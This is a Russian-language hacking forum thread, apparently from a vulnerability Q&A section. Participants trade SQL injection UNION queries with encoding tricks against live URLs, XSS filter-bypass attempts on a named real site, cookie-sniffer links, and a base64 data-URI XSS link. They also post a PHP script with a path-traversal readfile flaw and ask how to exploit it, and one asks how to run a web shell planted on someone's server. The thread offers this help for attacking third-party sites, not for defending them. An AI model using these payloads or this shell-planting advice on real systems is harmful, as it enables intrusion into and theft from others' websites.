Ваши вопросы по уязвимостям.

Там же xss обычная

 

Я так и понял. Просто набрел случайно. Вот решил посмотреть, что с таким сделать можно.

 

Не на всех браузерах такое замечательное окошко всплывает. Вроде фильтрация еще имеет место быть.
Спасибо.
Когда-то давно был сниффер на античате. Пропал?
Что можно сделать?

 

Вот тебе снифер

Только не спрашивай как его заюзать, а лудше почитай статьи про XSS!

 

Возможно задам довольно глупый вопрос, но как мне вывести запрос из mysql inj в нужной мне кодировке ?

К примеру есть запрос:
GET /index.php?sth=999999.9+union+all+select+text,2,3+from+art--

При этом вывод из бд в кодировке UTF-8, а кодировка сайта WINDOWS-1251 (cp1251). Как мне сделать так, чтобы вывод был в кодировке cp1251 ?

Вообще(вроде), это можно сделать так:
SET NAMES cp1251
SET CHARACTER SET cp1251

Но как мне все это объединить в один запрос ?

 

Здесь два варианта, либо юзать cast() или CONVERT(),либо шифровать и дешифровать данные, типа: unhex(hex(version())), в вашем случаи, это будет выглядеть так:
/index.php?sth=999999.9+union+all+select+CONVERT(text+using+latin1),2,3+from+art--, либо же:
/index.php?sth=999999.9+union+all+select+unhex(hex(text)),2,3+from+art--, и потом воспользоваться например: http://www.string-functions.com/hex-string.aspx для расшифровки полученного результата

 

/index.php?sth=999999.9+union+all+select+CONVERT("заголовок - "+USING+cp1251),CONVERT(title+USING+cp1251),3+from+art--

Вот так, выводится заголовок из статьи правильно, но вот "заголовок-" => "скачать" . В чем проблема ?

 

Ограничение в строке на длину походу, вообще первый раз с таким фильтром встречаюсь.

 

Отправь пост запрос

http://www.fernando9torres.com

p=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--+

 

Как юзать знаю.
Просто раньше на античате был рабочий онлайн сниффер. Теперь придется хостера искать
Что делать знаю.
Спасибо.
А сниффер вот этот http://www.kanicq.ru/sniffer/

 

Давненько уже сниффер на ачате не наблюдается. Вы как будто с каменного века пришли . Хостинг не проблема, если интересуют бесплатные варианты, то вот тема.

 

Подскажите мануальчик: с описанием функций mysql (floor,mid,ansi, -- f ...)активно используемых в раскрутке скулей и обхода фильтрации /**/ () ....

 

Огромное спасибо за тему.
Очень помогла

Итак. Залил сниффер.
Проверяем фильтрацию
http://www.popmech.ru/templates/admin/functions/wysiwyg/admin_wysiwyg_iframe.php?area=full_area&dir=%22%3E%3C%3E=%28%29;/%22%22+%27%27?

Ответ: <>=();/\"\" \'\'?">

" - \"
' - \'
+ - удалился

Соит ли дальше сражаться?

Пробовал через инклуд js
Через String.fromCharCode()

Ничего не получается.

 

c0n,
_https://forum.antichat.ru/nextoldesttothread76143.html
_http://www.securitylab.ru/analytics/274302.php

 

За ссылки огромное спасибо. Вроде работает

НО:
1) Выпадает ряд браузеров (IE, Chrome - у мну не завелся)
2) Доступна по конструкции типа

Code:

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgn9fX1Jyk8L3NjcmlwdD 4=">Ссылко в Сибирь</a>

Других вариантов использования не нашел.

 

c0n, прояви си) напиши админу, не работает ссылка в опере и твоя xss

 

По работоспособности

Писал. Там то ли не понимают, то ли не хотят понять.

 

Последовал вашему совету, вот скрипт:

Code:

<?  /* // +--------------------------------------------------------------------------+ // | 
Project:    TBDevYSE - TBDev Yuna Scatari Edition                        | // 
+--------------------------------------------------------------------------+ // |
 This file is part of TBDevYSE. TBDevYSE is based on TBDev,               | // | originally by RedBeard of TorrentBits, extensively modified by         
  | // | Gartenzwerg.                                                             | // 
|                                                                      
    | // | TBDevYSE is free software; you can redistribute it and/or modify      
   | // | it under the terms of the GNU General Public License as published by  
   | // | the Free Software Foundation; either version 2 of the License, or    
    | // | (at your option) any later version.                                  
    | // |                                                                          | // | TBDevYSE is distributed in the hope that it will be useful,           
   | // | but WITHOUT ANY WARRANTY; without even the implied warranty of          
 | // | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the            | // | GNU General Public License for more details.                            
 | // |                                                                        
  | // | You should have received a copy of the GNU General Public License      
  | // | along with TBDevYSE; if not, write to the Free Software Foundation,     
 | // | Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA           
 | // +--------------------------------------------------------------------------+ 
// |                                               Do not remove above lines! | // 
+--------------------------------------------------------------------------+ */  
$pic = htmlspecialchars((string) $_GET["pic"]);
 readfile("torrent_files/images/$pic");
 die();
 require "include/bittorrent.php";
 dbconn(false);
  loggedinorreturn();
   stdhead("Просмотр картинки");
 print("<h1>$pic</h1>\n");
 print("<p align=center><img src=\"torrent_files/images/$pic\"></p>\n");
 ?>  <h3 align=center><a href="javascript: history.go(-1)">Назад</a></h3>  <? stdfoot();
 ?>

Как его можно использовать? Спасибо

 

Прошу прощения, что задаю дурацкие вопросы, но сам пода не могу дотумкать:
разместил-таки шелл на сайте, подключившись через openVPN по адресу:
//ххх.ххх.ххх.ххх/shell.php
Но при попытке его запустить получаю следующее:
file://ххх.ххх.ххх.ххх/shell.php
Как следствие, получаю его код, если-же вписать в адресную стоку http://ххх.ххх.ххх.ххх/shell.php то происходит редирект:
http://site/shell.php и выводится: "No input file specified."
Как-же его все-таки запустить? Спасибо
Да, может это важно, если отключиться от openVPN, то указанный ip не доступен